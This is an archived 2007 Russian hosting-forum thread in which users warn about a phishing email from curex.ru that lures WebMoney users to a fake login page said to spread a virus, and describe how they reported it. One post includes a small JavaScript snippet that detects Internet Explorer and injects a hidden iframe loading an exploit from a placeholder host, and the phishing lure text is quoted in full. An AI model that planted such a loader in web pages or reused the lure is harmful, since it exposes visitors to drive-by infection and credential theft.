Помощь - Поиск - Пользователи - Календарь
Полная версия: Новый мошенник в сети
Онлайн-форум hostobzor.ru > Архив (темы до 1.06.2015). Только для чтения. > Коммерческий хостинг. Общие форумы > Флейм
Ilya Konovalenko
16.08.2007, 15:45
Здравствуйте,

В сети появился новый сайт - вирус для пользователей ВМ.
Приходит сообщение на почту:
Цитата
Здравствуйте!

Мы получили информацию что Вы занимаетесь мошенничеством, на нашем сайте кем-то написана статья про Вас. Приймите
обсуждение, ведь это теряет Вашу репутацию:
<a class="quotelink" href='http://curex.ru/ReturnUrl.php?ReturnURL=/viewtopic.php?id=****' target='_blank'>http://curex.ru/ReturnUrl.php?ReturnURL=/v...pic.php?id=****</a>

===================================================
С Уважением робот форума <a class="quotelink" href='http://curex.ru/' target='_blank'>http://curex.ru/</a>
curexbot@mail.ru
support@curex.ru


При переходе по ссылке предлагают пройти ВМ авторизацию, далее вирус.

Администрации ВМ и Есерверу сообщение уже отправленно.
rustelekom
16.08.2007, 16:04
ага, причем пишут что мол сайт оптимизирован тока под интернет эксплорер (читай чтоб экспоит сунуть smile.gif) . социо инженеринг в действии. многие ведь пойдут.
Ivan
16.08.2007, 16:09
Как страшно жить.
Ilya Konovalenko
16.08.2007, 16:21
Надо бы позвонить по телефонам, указанным в whois, поговорить, скорее всего зарегистрированно или на хостера или на подставное лицо.
Ilya Konovalenko
16.08.2007, 16:39
Спасибо Илье Степанову из eServer, сайт заблокирован.
Осталось добавится блока домена, но это уже думаю задача для webmoney.
alert
18.08.2007, 11:11
хе, какие элементарно делают.
через те же xss(Cross Site Scripting)
Просто траянизация юзеров сплоитами, к известным браузерам( как мы знаем эксплорер это ваще жесть которой страшно пользоваться)
создают страничку, которая распознаёт браузер средствами JavaScript и в соответствии с ним
выбирает из заначки сплойт, приписывая его к телу документа. Вот простенький пример такой страницы:
Цитата
<script language="JavaScript">
if(navigator.appName == 'Microsoft Internet Explorer')document.write('<iframe width=0 height=0 src="http://_IE_EXPLOIT_.html"></iframe>');
</script>

эт просто на заметку
miker
19.08.2007, 20:43
Цитата(Ilya Konovalenko @ 16.08.2007, 16:45) *

Здравствуйте,

В сети появился новый сайт - вирус для пользователей ВМ.
Приходит сообщение на почту:
При переходе по ссылке предлагают пройти ВМ авторизацию, далее вирус.

Администрации ВМ и Есерверу сообщение уже отправленно.


Мда, не перевелись еще мошенники на земле нашей.
MasterDedicated
20.08.2007, 11:52
Цитата(miker @ 19.08.2007, 20:43) *

Мда, не перевелись еще мошенники на земле нашей.

Но неужели Вас это удивило? biggrin.gif
...извиняюсь за офтоп.
Alphanion
20.08.2007, 23:05
Мне несколько раз приходили письма примерно такого содержания как бы от девушки:

Ты такой растакой урод и мерзавец и т.д. и т.п. Во тут теперь твои фотки, пускай все полюбуются.
Дальше ссылка. Проходишь по ссылке, получаешь вируса или трояна.

Я сразу заношу такие адреса или весь домен в черный список. А в инете без антивируса вообще нечего делать.
DLag
21.08.2007, 00:36
А может проще пользоваться браузерами с автообновлением, ну и менее уязвимым?
udofun
21.08.2007, 09:49
Цитата
Мы получили информацию что Вы занимаетесь мошенничеством, на нашем сайте кем-то написана статья про Вас. Приймите
обсуждение, ведь это теряет Вашу репутацию:
<a class="quotelink" href='http://curex.ru/ReturnUrl.php?ReturnURL=/viewtopic.php?id=****' target='_blank'>http://curex.ru/ReturnUrl.php?ReturnURL=/v...pic.php?id=****</a>

===================================================
С Уважением робот форума <a class="quotelink" href='http://curex.ru/' target='_blank'>http://curex.ru/</a>
curexbot@mail.ru
support@curex.ru


По поводу Curexя еще 16.08 отписал abuse провайдеру eserver.ru , где он и сейчас живет находится,
чуть позже отписал в арбитраж Webmoney, видимо уже после этого eserver.ru домен отключили.

Что же там за забавная страница висела у этого товарщиа... видимо только eserver может поделится.

2 Ivan
Цитата
Как страшно жить

да вобще не говори smile.gif жуть просто. cool.gif
hcenter.ru
21.08.2007, 15:05
Цитата(udofun @ 21.08.2007, 10:49) *

По поводу Curexя еще 16.08 отписал abuse провайдеру eserver.ru , где он и сейчас живет находится,
чуть позже отписал в арбитраж Webmoney, видимо уже после этого eserver.ru домен отключили.

Что же там за забавная страница висела у этого товарщиа... видимо только eserver может поделится.

2 Ivan

да вобще не говори smile.gif жуть просто. cool.gif

Страница с авторизацией Web Money.
Пришло такое же письмо, проверил через Анонимайзер. Сразу как только увидел страницу с авторизацией закрыл страницу.
Alex Gordeev
28.09.2007, 09:35
Цитата
Мне несколько раз приходили письма примерно такого содержания как бы от девушки:

Ты такой растакой урод и мерзавец и т.д. и т.п. Во тут теперь твои фотки, пускай все полюбуются.
Дальше ссылка. Проходишь по ссылке, получаешь вируса или трояна.

Я сразу заношу такие адреса или весь домен в черный список. А в инете без антивируса вообще нечего делать.

А по аське приходят такие вариации:

Смотри что тут про тебя пишут, я в шоке - и ссылка на троян, который потом угоняет аську или делает другие, не менее неприятные вещи smile.gif
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
Русская версия Invision Power Board © 2001-2025 Invision Power Services, Inc.